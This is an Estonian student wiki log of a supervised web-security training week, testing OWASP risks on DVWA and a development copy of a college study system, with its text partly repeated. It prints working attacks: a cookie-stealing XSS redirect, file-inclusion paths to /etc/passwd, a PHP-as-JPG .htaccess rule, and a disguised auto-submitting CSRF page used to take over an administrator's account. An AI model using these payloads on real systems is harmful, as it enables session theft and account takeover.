Urmo: Intensiivõppe nädalaga sai õpitud nii mõndagi huvitavat veebiturve ja selle testimise kohta. Kuna aega oli vähe, siis sai hulgaliselt kogemust ja oskust reaalselt planeerida mahukat tööd täiesti nullist kuni reaalse rakendatava tulemuseni ning pani proovile stressitaluvuse tõestamaks pinge all jätkusuutlikku töötamist. Intensiivõppe nädalal võiksid osaleda kõik, kellel väheke tahtmist midagi uurida ja korda saata ning saada reaalset töökogemust ennem töömaailma sukeldumist.

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T10:30:14Z

Ulihten: /* 4. päev - Presentatsiooni tegemine ja esitlemine */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]
Taavi esitlus [[https://wiki.itcollege.ee/index.php/File:A9.pdf]]
Taavi esitlus [[https://wiki.itcollege.ee/index.php/File:A5.pdf]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
http://www.webresourcesdepot.com/10-free-web-application-security-testing-tools/
http://www.acunetix.com/vulnerability-scanner/getting-started.htm

Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus:
Acunetix Web Vulnerability Scanner v. 8
http://www.acunetix.com/vulnerability-scanner/

Pärast programmi installimist tuli seadistada skännimine, valisime keskmie põhjalikkusega skänni.
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.
Antud programm võimaldab skännida:
Cross-Site Scripting (XSS)
SQL Injection (blind test)
File inclusion
Code Execution
LDAP Injection
Cross Frame Scripting
SQL Injection (error msg. test)
CRLF Injection
Directory Travelsal
XPath Injection
URL Redirection
Application Error Message

Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur ja skänn tegi vähe päringuid tunnis siis oleks täisskänni ajaliselt paar päeva.

=== Urmo tegevus ===

Kasutan BackTrack 5 R2 64bit Gnome ja Samurai CD 0.9.9 operatsioonisüsteeme katsetamaks ja uurimaks erinevate veebilehtede turvariskide ära kasutamist.

Pandud tööle Samurai ja kasutatud Damm Vurnelable Web Application'i.

==== Brute Force (DVWA) ====
Käsitsi välja uuritud login andmed:
kasutajanimi: admin
parool: password

===== Fireforce plugin Firefoxis =====
Tekitatud sai ka password list faili pass.txt.

Kasutusel oli Firefox brauser, kuhu installisime plugin'a Fireforce.
Siin kasutasime Youtube õpetust: http://youtu.be/lmgMXhM01fY .

Panime kasutajanimeks "admin" ja paroolilahtris parema klõpsuga valisin Fireforce menüüst Library, ning laadisin talle pass.txt faili sisse.
Küsiti veel, et mis teksti veebilehelt peab otsima, kui sisselogimine on ebaõnnestunud.
Selleks sai sõna "incorrect".
Määrata ära tuli ka, et mitu päringut sekundis tehakse.
Panime 10 aga kuna veebileht ei jõua sekundis nii palju ennast kuvada.
Päringute tegemise kiirus vähem kui 1 päring/sekundis.

Töötavat tulemust me ei saanud, kuna õigest paroolist mindi üle pidevalt.
Kasutasime ka videos näidatud "@ DICTIONARY" teksti ühes lahtris ja siis plugin ei tahtnud üldse proovida ja lasi kõik katsed üle mingil põhjusel.

Kuna me seda lahendust ei saanud tööle, siis sai proovitud ka BurpSuite programmi.

===== Burpsuite v1.4 =====
Burpsuite v1.4 on Samurai WTF'il olemas juba sees ja saab kohe käima panna.
[[File:Bp2naide.jpg|200px|thumb|right|BurpSuite näidis screenshot UI'st]]

Programm on juba loomult keerulisem.
Burpsuite'iga tuleb panna käima proxy server localhost'is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine.
Läbi proxy serveri tuleb BurpSuite'ile kohale vastava veebilehe Header sisselogimise kohta.
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.
Payload'i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.
Ründe stiiliks määrata Pitchfork.
Mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -> Start Attack, mis siis alustas rünnet.
Kahjuks ka see rünne ei toiminud teadmata põhjusel.
Proovitud sai ka lühemate nimekirjadega ja edutult.

Peale teise programmi kasutamist jõudsime järeldusele, et Brute Force ründest pole meil kasu ja ei aita eesmärki täita effektiivselt.
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5-ks sisselogimine ära vastava teatega ja brute force programmidele ei tule vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.

Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.

==== CSRF - Cross-site request forgery ====
Katsetamine toimub koos Taaviga.

Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.

Katse eesmärgiks on DVWA-s kasutaja parooli muutmine, niiet ta ise paneb meie veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse see koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.

Lõime uue faili - crosssite.txt

DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.
Võtsime lehe Source Code lahti
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.
Current Password lahtri jätsime samaks.
Ülejäänud kahe uue passwordi fieldi type'iks määrasime "Hidden" ja value'deks "admin".
Salvestasime faili ja käivitasime selle.
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.
Panime sisse tolle hetke parooli ning saatsime teele päringu ning saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud sõna ".

Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.

=== Taavi tegevus ===

Backtrack 5 R2 - parimate tööriistade ja meetodite uurimine et leida turvanõrkusi.

=== Matise tegevus ===
==== Reflected Cross Site Scripting (XSS) ====
<ul>
<li>Lehel on selline Form:</li>
[[Image:Xsstesting.jpg|Location="left"|Caption|]]
<br>Form väljastab : Hello „sisestatud nimi“
<li>Easy puhul:</li>
<li>Saab sisestada textboxi skripti:</li>
<script>
alert(document.cookie.match(/PHPSESSID=[^;\]+/));
</script>
<li>Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.</li>
<li>Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: </li>
<script>
this.document.location.href = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);
</script>
<li>Saab kohe enda veebiserveri logidest näha Session ID’d.
<br>Näide logist:</li>
/var/log/apache2/access.log
127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] "GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1" 404 404 "-" <br> "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11"
<li>Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.</li>
</ul>

=== Sanderi tegevus ===
[[File:DVWA_upload.png|150px|thumb|DVWA Upload]]

SamuraiWTF kasutamine testimiseks: DVWA (Damn Vulnerable Web Application).
==== Faili üleslaadimine: madal tase ====
<ul>
<li><b>DVWA Security</b> määrata: Low -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess</li>
Üleslaetavasse *.php faili saab kirjutada php koodi:
<?php var_dump($_REQUEST, $_SERVER); ?>
<li>Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:</li>
esimeses massiivis "PHPSESSID" ("2b1ae19446cfde009664f18df51b6ec1") ja turvatase "security" ("low");
teises "HTTP_COOKIE", milles on eelnevadki andmed; asukoht "PATH", "SERVER_SOFTWARE", "SERVER_NAME",
"SERVER_ADDR" ("127.42.84.1"), "SERVER_PORT" ("80"), "REMOTE_ADDR" ("127.42.84.1"), "REMOTE_PORT" ("53425") jpm.
</ul>

==== Faili üleslaadimine: keskmine tase ====
<ul>
<li><b>DVWA Security</b> määrata: Medium -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida ei saa näiteks järgnevates formaatides faile:</li>
.htaccess
.php .html .pdf
.gif .png .bmp
.svg .swf
.tif .tiff .exif
.raw .cgm
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
<li>Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:</li>
http://dvwa/hackable/uploads/*.jpg
<li>Skripti käivitamiseks tuleb kasutada "?page=" ja faili asukoht:</li>
http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg
Kuvatakse php skripti tulemus.
Kommentaar: "?page=" kasutamine võetud menüüvalikust: <b>File Inclusion</b>
<li>"?page=" abil saab vaadata kasutajate nimesid:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd
<li>Paroole vaadata ei saa, selleks õigused puuduvad:</li>
http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow
</ul>

==== Faili üleslaadimine: kõrge tase ====
<ul>
<li><b>DVWA Security</b> määrata: High -> Submit</li>
<li>Valida: Upload</li>
<li>Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)</li>
Üleslaetavasse *.jpg faili saab kirjutada php koodi.</li>
<li>Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.</li>
<li>Skripti käivitamiseks ei piisa ka "?page=" kasutamisest. Igal juhul on vastus selline:</li>
ERROR: File not found!
<li>Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:</li>
http://www.motobit.com/util/base64-decoder-encoder.asp
<li>Moodustades loodud faili asukohast kood ja kasutades</li>
data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:
http://dvwa/hackable/uploads/*.jpg
</ul>

== 3. päev ==

=== Alo tegevus ===
Lihtsalt url modifitseerimisega leidsime mittekaitstud lingi:

Õppesoorituste all on võimalik laadida alla kõikide kasutajate õpingukaardid (lihtsalt tuleb otsida üles soovitud kasutaja student_id)
Arvete alt peaks ka võimalik sama viga ära kasutada, aga kuna ühtegi arvet hetkel süsteemis polnud ei olnud võimalik seda viga kinnitada.

=== Urmo tegevus ===
====Subgraph Vega ====
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.
Programm on Java põhine graafilise liidesega ja töötab Linux'i, OS X ja Windowsi peal.

[[File:Screenshot_vega1.png|200px|thumb|right|Subgraph Vega screenshot]]
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.

Alustasime uut skänni (Start New Scan).
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.

Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised.

Me lisasime ainult küpsise (cookie) sisu:
<pre>
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221
</pre>
ning Finish.

[[File:Screenshot_vega2.png|200px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).

Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000.

Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script'ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body nõrkust.

Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID'sid ja parameetreid ära oma pealkirjades.
Õnneks parameetritega väljad olid veebilehel korralikult ära escape'itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.

ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.

==== Wapiti ====
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti.
(Koduleht: http://wapiti.sourceforge.net/)

Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud HTTPS'iga midagi teha.

==== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga====
=====1. katse - ÕISi keskkkonna keelevahetus =====
[[File:Keeleseaded.png|thumb|200px|right|ÕISi keeleseadete menüü]]

Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.

Võtsime dev-ÕIS'i Source Code'ist välja vastava formi osa ja panime eraldi html faili.
Koristasime mittevajaliku disaini koodi juurest ära.
Muutsime form'i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks "en" ehk inglise keelne keskkond tekiks.
Panime koodi enose veebiserverisse üles nimega ois.html.

Faili sisu:
<source lang="html4strict">
<form id="settingsForm" method="post" action="https://itcollege.dev.ois.ee/setting/edit?user_id=2198"
enctype="application/x-www-form-urlencoded">
<input type="hidden" AUTOCOMPLETE="off" name="default_language"value="en">
<br>
<input type="submit" value="Salvesta seaded" name="Savesettings">
</form>
</source>
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.

Katsetas koodi enda konto peal Taavi.

=====2. katse - ÕIS'i kasutaja parooli muutmine =====

[[File:Salasona_ois.PNG|200px|thumb|right|Dev_OIS salasõna muutmisvorm]]
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.

Selle jaoks uurisime välja, kus asub dev-ÕIS'i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.

Muutsime password ja password_check lahtrite väärtused järgnevaks: "test123" ehk kasutaja uus parool peale rünnakut.

Lahtrites muutsime user_id'd sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.

Kõik vormi lahtrite tüübid määrasime peidetud ehk "hidden", et poleks midagi näidata.

Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist.
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.

Lisasime CSS koodi Submit nupu ära peitmiseks.
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.

Salvestasime faili ära kui "screen1.jpg" fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.

Faili sisu:
<source lang="html4strict">
<html>
<head>
<style type="text/css">
#Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }
</style>
</head>
<body>
<body onload="document.forms.setPasswordForm.submit();">
<form name="setPasswordForm" id="setPasswordForm"
action="https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&continue=/auth/logout"
method="post">
<input type="hidden" name="user_id" value="2227" id="user_id" />
<input type="hidden" name="continue" value="%2Fet%2Fsetting%3Fuser_id%3D2227" id="continue" />
<input type="hidden" name="password" id="password" value="test123" />
<input type="hidden" name="password_check" id="password_check" value="test123" />
<input type="submit" name="Setpassword" id="Setpassword" value="Muuda salasõna" />
</form>
</body>
</html>
</source>

[[File:Admin_proof.PNG|200px|thumb|right|Ligisaadud adminpaneelile]]

Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.
<pre>
AddType application/x-httpd-php .php .jpg
</pre>

Laadisime mõlemad failid Enose veebiserverisse avalikult.

Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki.
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle.
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail.
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja.
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud "test123"-ks ja me saime ligipääsu administraatori õigustes kontole.
Rünnak oli edukas.
[[File:Pass fixed.PNG|200px|thumb|right|Dev_OIS fixed]]

Andsime teada Valterile teada, et tegelikult tegime salajase ründe.
Suhteliselt koheselt oli Valteril see CSRF ründe vastu dev-ÕIS ära parandatud, kuna tal oli juba koodiparandus olemas aga lihtsalt rakendamata ja me tabasime ajaliselt viimase hetke ära, kus seda rünnet sai teha.
Peale parandust enam see rünne läbi ei läinud ja süsteem hõiskab vastu, et tegu on ründe või mõne bug'iga.

Kuna tegu oli ÕIS'i arendusversiooniga, siis oli serveris oli lubatud ka error_reporting, mis annab välja ka pildil oleva errorite jada.
Error Reporting on maha keeratud Live keskkonnas ja seal sellist pikka keerulist koodijada veateadetega ette ei tule ning saadetakse teade arendajatele automaatselt.

=== Taavi tegevus ===
===Burp suite===

Esimese asjane peale Burp suite käivitamist. Tabilt proxy ->intercept ->intercept off<br>
Järgnevalt seadistada proxy enda veebiprauserist (mõistlik panna localhost aadress 127.0.0.1 port 8080 ning lülitada sisse ka ssl proxy)<br>
Proxy -> options alt lülitada sisse proxy listner pordile 8080 .<br>
Ohvri valimine <br>
Valida intruder -> target ning sinna sisestada veebileht mida on plaanis uurida https lehe korral lülitada sisse ssl ning pordiks valida 443.<br>
Kui on tarvis lehte ka sisse logituna uurida siis tuleb seadistada järgmised parameetrid.<br>
Valida Options tab sealt sisse lülitada www authentication ning täita all olevad read.<br>site mida rünnatakse tema tüüp(üldiselt basic), login, parool ning valida add.
Kui on soov sooritada veebilehe sipderingi siis tuleb excludida ka logout käsud.<br>
Targer->scope -> exclude frome scope ja veenduda at välja on arvatud logout laused.<br>
Spideringi sisselülitamine <br>
Valida tab Spide ning sealt panna linnuke kasti spider running.<br>
Ning oledki valmis saama laheküljelt infot.<br>
Tööriistal on veel tohutu hulk seadistus võimalusi, aga kahjuks ajanappuse tõttu ei jõudnud nende kõikidega tutvuda.<br>
Tööriis ei ole mõeldud algajatele, kuid teda tundma õppides on võimailik sooritada keerukaid operatsioone. Suurim nõrkus sellel programmil on see, et ta otsing ei näita ära nõrkasid kohti veebilehel vaid need tuleb ise koodist ülesse otsida.

==Nessuse algkäivitamine==
Valida backtrackist vulnerability scannerite alt nessus ning edasi nessus register .<br> Täite ära vajalikud read veebilehel ning mailile saadetakse aktiveerimis kood.<br> Järgnevalt avada termnal ning sisestada käsk : /opt/nessus/bin/nessus –fetch –register **********(tärnide asemele meilile saadetud kood)<br>
Nüüd läheb aega kuni nessus updatedakse (ole valmis ootama võtab tükk aega.)<br>
Järgnevalt käivitada nessus user add ning sinna sisestada soovitav kasutajanimi nessusele, kui küsitakse kas admin konto siis sisestada y. Kõik on korras kui tuleb ette kiri user added.<br>
Järgnevalt valida nessus start.<br>
Et nessusesse siseneda veebibrauseri URL i kirjutada 127.0.0.1:8834
Siis avaneb leht kus tuleb vajutada lehe alaosas olevale lingile mis suunab https leheküljele.<br>
Antud tööriist ei ole just kõige sobilikum veebilehtede testimiseks.

=== Matise tegevus ===

=== Sanderi tegevus ===
[[File:W3af skanner.png|150px|thumb|w3af skänni seaded]]
Backtarcki keskkonnas sai testitud programmi w3af.

==== Backtrack: w3af ====
[[File:Basic HTTP Auth.png|150px|thumb|w3af Basic HTTP Auth]]
[[File:ÕISi küpsis.png|150px|thumb|Mozilla Firefox küpsis]]
[[File:W3af_Cookie.png|150px|thumb|w3af Cookie]]
Võimalik kätte saada SSL Certificate.
Aadressiribalt leitud sisselogimis-aadressiga sisse logimine ei õnnestunud:
https://itcollege.dev.ois.ee/auth/login?continue=/auth/login?
username=<font color="red">KASUTAJANIMI</font>&continue=&Login=Logi sisse&pw=<font color="red">PAROOL</font>
Programmi sisestatud andmetega ka mitte:
Configuration -> HTTP Config -> Basic HTTP Authentication:
basicAuthUser: <font color="red">KASUTAJANIMI</font>
basicAuthPass: <font color="red">PAROOL</font>
basicAuthDomain: http://itcollege.dev.ois.ee
Mozilla Firefoxi küpsis õnnestus luua Töölauale hetkel sisse logitud sessiooni ID-ga. Programmi küpsise sisestamine:
Configuration -> HTTP Config -> Cookies
cookieJarFile: /root/Desktop/<font color="red">ois_cookie.txt</font>
Seda loodud sessiooni ID-ga küpsist kasutada algul ei õnnestunud. Ilmselt oli midagi valesti. Õige on:
# Netscape HTTP Cookie File
.dev.ois.ee TRUE / FALSE 1731510001 itcollege_OIS_SESSION_ID <font color="red">870aqllryuw3cmf6cv8ellha03</font>
Esimene rida on nõutav! Teiste tähendused:
domain - The domain that created and that can read the variable.
flag - A TRUE/FALSE value indicating if all machines within a given domain can access the variable.
This value is set automatically by the browser, depending on the value you set for domain.
path - The path within the domain that the variable is valid for.
secure - A TRUE/FALSE value indicating if a secure connection with the domain is needed to access the variable.
expiration - The UNIX time that the variable will expire on.
name - The name of the variable.
value - The value of the variable.
Küpsis on leitav Mozilla Firefoxis peale itcollege.dev.ois.ee-s oma kasutajaga sisse logimist:
Edit -> Preferences -> Privacy -> History -> remove individual cookies
Search: itcollege.dev.ois.ee
Leitud valiku all Cookie Name: itcollege_OIS_SESSION_ID

Skänneerimine:
<ul>
<li>The page language is: en</li>
<li>The URL: "https://itcollege.dev.ois.ee/" has a "<form>" element with auto-complete enabled.</li>
<li>A comment with the string "<p>tunne end kui koolis</p>" was found in: "https://itcollege.dev.ois.ee/".</li>
<li>Found a form login. The action of the form is: "https://itcollege.dev.ois.ee/auth/login".</li>
The username field to be used is: "username".
The password field to be used is: "pw".
<li><font color="red">Found authentication credentials to: "https://itcollege.dev.ois.ee/auth/login". A correct user and password combination is: Administrador/6666666</font></li>
Antud kasutaja ja parooliga sisse ei saanud.
<li>The URL: "https://itcollege.dev.ois.ee/" returned a response that may contain a "SHA1" hash. The hash is: "c7b39896de5f296b5a44c2dfcd9f0600b2cf424d". This is uncommon and requires human verification.</li>
Taolisi ja MD5 hashiga ridu leiti 355. Kõik vajavad inimese kontrolli.
<li>The URL: "https://itcollege.dev.ois.ee/" sent these cookies:</li>
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; path=/
itcollege_OIS_SESSION_ID=lm8llh4i3k2yj4d7rho6791u05; Path=/
<li>The SMTP settings in emailReport plugin seem to be incorrect. Original error: "[Errno 111] Connection refused".</li>
Kui tuleb see veateade, siis skänn katkeb.
<li><font color="red">The following scripts allow an attacker to send POST data as query string data (this makes XSRF easier to exploit):</font></li>
The URL: https://itcollege.dev.ois.ee/auth/openid-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
The URL: https://itcollege.dev.ois.ee/auth/id-login is vulnerable to cross site request forgery.
It allows the attacker to exchange the method from POST to GET when sending data to the server.
<li><font color="red">SQL injection in a Unknown database was found at: "https://itcollege.dev.ois.ee/auth/login", using HTTP method POST.</font></li>
The sent post-data was: "username=John8212&security_key_sis_global=d'z"0&Login=Logi%20sisse&continue=56&pw=FrAmE30.".
The modified parameter was "security_key_sis_global". This vulnerability was found in the request with id 390.
<li>Leidis ka otsirobotitele mõeldud faili: https://itcollege.dev.ois.ee/robots.txt</li>
User-agent: *
Disallow: /
Allow: /curriculum
Allow: /subject
Allow: /diploma
Allow: /schedule/ical
</ul>

== 4. päev - Presentatsiooni tegemine ja esitlemine ==

Koostasime presentatsiooni ja esitlemine.

[[Media:Security_team_presentation.ppt]]

== Arvamused intensiivõppe nädala kohta ==

== Tegijad ==
Alo Konno A21

Urmo Lihten A21

Taavi Podžuks A22

Matis Alliksoo A22

Sander Saarm A22

== Juhendajad ==
Mart Mangus

Margus Ernits

Valter Kungla

Security team

2012-03-30T10:28:54Z

Ulihten: /* Tegijad */

== 1. päev - Materjalidega tutvumine ==

https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

A1: Injection - Urmo
A2: Cross-Site Scripting (XSS) - Alo
A3: Broken Authentication and Session Management - Sander
A4: Insecure Direct Object References - Alo
A5: Cross-Site Request Forgery (CSRF) - Taavi
A6: Security Misconfiguration - Matis
A7: Insecure Cryptographic Storage - Matis
A8: Failure to Restrict URL Access - Urmo
A9: Insufficient Transport Layer Protection - Taavi
A10: Unvalidated Redirects and Forwards - Sander

Sanderi konspekt: [[Media:Ois_materjal.pdf]] <br>
Urmo esitlus: [[Media:Injection-Failure_URL_access.ppt]]
Taavi esitlus [[https://wiki.itcollege.ee/index.php/File:A9.pdf]]
Taavi esitlus [[https://wiki.itcollege.ee/index.php/File:A5.pdf]]

== 2. päev - Nõrkuste ja rünnete tundmaõppimine ja katsetamine==
===Security Team tegevusplaan===
1. Päev
1.1 Tutvuda OWASP’iga.
1.2 Tutvuda OWASP’i aasta 2010 TOP 10 veebirakenduse turvariskidega.
1.3 Iga grupiliige teeb 2 turvariski kohta väikese tutvustava ettekande.
2. Päev
2.1 Esitada tiimi tegevusplaan.
2.2 Tutvuda turvariskidega natuke põhjalikumalt.
2.3 Tutvuda ja katsetada erinevaid pen-testingu tööriistasid – BackTrack ja SamuraiCD võimalused.
2.4 Täiendada esimese päeva ettekannet.
3. Päev
3.1 Alustada dev-ÕISi peal turvariskide leidmist – samuti iga grupi liige testib/katsetab 2 turvariski ekspluateerimist.
3.2 Saadud tulemuste dokumenteerimine.
4. Päev
4.1 Saadud tulemuste esitlemine ettekandega
5. Päev
5.1 Tulemuste parandamine wiki’s.

=== Alo tegevus ===

http://www.acunetix.com/support/vulnerability-checks.htm
http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting
http://wiki.developerforce.com/page/Secure_Coding_Cross_Site_Scripting
http://www.youtube.com/watch?v=SG1cvGQ971g
http://www.isecom.org/research.html
http://evuln.com/tools/
http://sectools.org/tag/web-scanners/
